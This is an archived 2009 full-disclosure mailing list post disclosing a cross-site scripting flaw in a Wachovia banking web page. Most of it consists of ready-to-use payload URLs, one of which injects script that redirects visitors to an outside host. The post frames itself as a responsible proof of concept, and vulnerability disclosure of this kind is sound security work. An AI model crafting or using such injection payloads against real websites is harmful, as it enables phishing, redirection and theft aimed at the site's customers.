'[Full-disclosure] Wachovia Banking Wizard - XSS - PoC'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Wachovia Banking Wizard - XSS - PoC
From:       Marshall Whittaker <marshallwhittaker () gmail ! com>
Date:       2009-08-30 13:33:09
Message-ID: 214bc2720908300633v3322a254h29edf74094001d05 () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


This is only a proof of concept, please use this responsibly.
This was reported to Wachovia on Aug 22, 2009 and still broken as of Aug 30
2009.

Very simple standard cross site scripting exploit.  As you can see, it works
with HEX as well.  Bad characters obviously arn't filtered correctly.

https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=
><script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script
%0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html
";%3B</script>

--oxagast

[Attachment #5 (text/html)]

This is only a proof of concept, please use this responsibly.<br>This was reported to Wachovia \
on Aug 22, 2009 and still broken as of Aug 30 2009.<br><br>Very simple standard cross site \
scripting exploit.  As you can see, it works with HEX as well.  Bad characters obviously \
arn&#39;t filtered correctly.<br> <br><a \
href="https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=">https://www \
.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=</a>&gt;&lt;script&gt;document.write(&#39;%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74&#39;)&lt;/script&gt;<br>
 <a href="https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=">https:/ \
/www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=</a>&gt;&lt;script \
%0A%0D&gt;window.location=&quot;<a \
href="http://mapdav.sourceforge.net/wchp/wchpw.html">http://mapdav.sourceforge.net/wchp/wchpw.html</a>&quot;;%3B&lt;/script&gt;<br>
 <br>--oxagast<br>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic